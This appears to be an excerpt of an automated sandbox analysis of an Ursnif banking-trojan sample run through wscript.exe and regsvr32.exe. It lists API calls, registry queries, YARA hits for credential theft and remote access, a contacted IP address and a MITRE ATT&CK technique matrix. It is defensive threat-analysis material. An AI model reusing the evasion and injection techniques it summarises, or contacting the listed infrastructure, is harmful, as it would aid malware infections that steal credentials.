            Source: wscript.exe, 00000000.00000002.827105716.0000020AC82D0000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
            Source: wscript.exe, 00000000.00000002.827105716.0000020AC82D0000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_72E21FA6 LdrInitializeThunk,GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_72E5F519 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_72E5F44F mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_72E5F059 push dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_72E21E95 InitializeCriticalSection,TlsAlloc,RtlAddVectoredExceptionHandler,GetLastError,

            HIPS / PFW / Operating System Protection Evasion:

            barindex
            Benign windows process drops PE filesShow sources
            Source: C:\Windows\System32\wscript.exeFile created: qua.xpi.0.drJump to dropped file
            System process connects to network (likely due to code injection or exploit)Show sources
            Source: C:\Windows\System32\wscript.exeNetwork Connect: 88.99.66.31 187
            Source: regsvr32.exe, 00000002.00000002.1192042863.00000000012F0000.00000002.00000001.sdmp, regsvr32.exe, 00000003.00000002.1192987316.0000000002EB0000.00000002.00000001.sdmpBinary or memory string: Program Manager
            Source: regsvr32.exe, 00000002.00000002.1192042863.00000000012F0000.00000002.00000001.sdmp, regsvr32.exe, 00000003.00000002.1192987316.0000000002EB0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
            Source: regsvr32.exe, 00000002.00000002.1192042863.00000000012F0000.00000002.00000001.sdmp, regsvr32.exe, 00000003.00000002.1192987316.0000000002EB0000.00000002.00000001.sdmpBinary or memory string: Progman
            Source: regsvr32.exe, 00000002.00000002.1192042863.00000000012F0000.00000002.00000001.sdmp, regsvr32.exe, 00000003.00000002.1192987316.0000000002EB0000.00000002.00000001.sdmpBinary or memory string: Progmanlock

            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA,
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_02AB350A cpuid
            Source: C:\Windows\SysWOW64\regsvr32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Mozart.zip VolumeInformation
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Mozart.zip VolumeInformation
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Mozart.zip VolumeInformation
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Mozart.zip VolumeInformation
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Mozart.zip VolumeInformation
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Mozart.zip VolumeInformation
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Mozart.zip VolumeInformation
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Mozart.zip VolumeInformation
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Mozart.zip VolumeInformation
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_72E21BB9 GetSystemTimeAsFileTime,_aulldiv,_snwprintf,CreateFileMappingW,GetLastError,GetLastError,LdrInitializeThunk,MapViewOfFile,GetLastError,CloseHandle,GetLastError,
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_02AB350A wsprintfA,RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree,
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_72E2177C CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError,
            Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

            Stealing of Sensitive Information:

            barindex
            Yara detected UrsnifShow sources
            Source: Yara matchFile source: 00000003.00000003.1075489749.0000000005168000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.1075693609.0000000005168000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.1194926522.0000000005168000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.1075767808.0000000005168000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.1075566551.0000000005168000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.1075739396.0000000005168000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.1075639616.0000000005168000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.1075243511.0000000005168000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.1075382255.0000000005168000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 3488, type: MEMORY

            Remote Access Functionality:

            barindex
            Yara detected UrsnifShow sources
            Source: Yara matchFile source: 00000003.00000003.1075489749.0000000005168000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.1075693609.0000000005168000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.1194926522.0000000005168000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.1075767808.0000000005168000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.1075566551.0000000005168000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.1075739396.0000000005168000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.1075639616.0000000005168000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.1075243511.0000000005168000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.1075382255.0000000005168000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 3488, type: MEMORY

            Mitre Att&ck Matrix

            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
            Valid AccountsWindows Management Instrumentation31Winlogon Helper DLLProcess Injection12Masquerading11Credential DumpingSystem Time Discovery1Remote File Copy3Data from Local SystemData Encrypted1Standard Cryptographic Protocol12Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
            Replication Through Removable MediaScripting121Port MonitorsAccessibility FeaturesVirtualization/Sandbox Evasion1Network SniffingVirtualization/Sandbox Evasion1Remote ServicesData from Removable MediaExfiltration Over Other Network MediumRemote File Copy3Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
            External Remote ServicesExecution through API1Accessibility FeaturesPath InterceptionProcess Injection12Input CaptureProcess Discovery1Windows Remote ManagementData from Network Shared DriveAutomated ExfiltrationStandard Non-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
            Drive-by CompromiseExploitation for Client Execution1System FirmwareDLL Search Order HijackingScripting121Credentials in FilesAccount Discovery1Logon ScriptsInput CaptureData EncryptedStandard Application Layer Protocol4SIM Card SwapPremium SMS Toll Fraud
            Exploit Public-Facing ApplicationGraphical User Interface1Shortcut ModificationFile System Permissions WeaknessFile Deletion1Account ManipulationSystem Owner/User Discovery1Shared WebrootData StagedScheduled TransferStandard Cryptographic ProtocolManipulate Device CommunicationManipulate App Store Rankings or Ratings
            Spearphishing LinkGraphical User InterfaceModify Existing ServiceNew ServiceObfuscated Files or Information2Brute ForceSecurity Software Discovery11Third-party SoftwareScreen CaptureData Transfer Size LimitsCommonly Used PortJamming or Denial of ServiceAbuse Accessibility Features
            Spearphishing AttachmentScriptingPath InterceptionScheduled TaskDLL Side-Loading1Two-Factor Authentication InterceptionRemote System Discovery1Pass the HashEmail CollectionExfiltration Over Command and Control ChannelUncommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
            Spearphishing via ServiceThird-party SoftwareLogon ScriptsProcess InjectionIndicator BlockingBash HistoryFile and Directory Discovery3Remote Desktop ProtocolClipboard DataExfiltration Over Alternative ProtocolStandard Application Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
            Supply Chain CompromiseRundll32DLL Search Order HijackingService Registry Permissions WeaknessProcess InjectionInput PromptSystem Information Discovery46Windows Admin SharesAutomated CollectionExfiltration Over Physical MediumMultilayer EncryptionRogue Cellular Base StationData Destruction

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet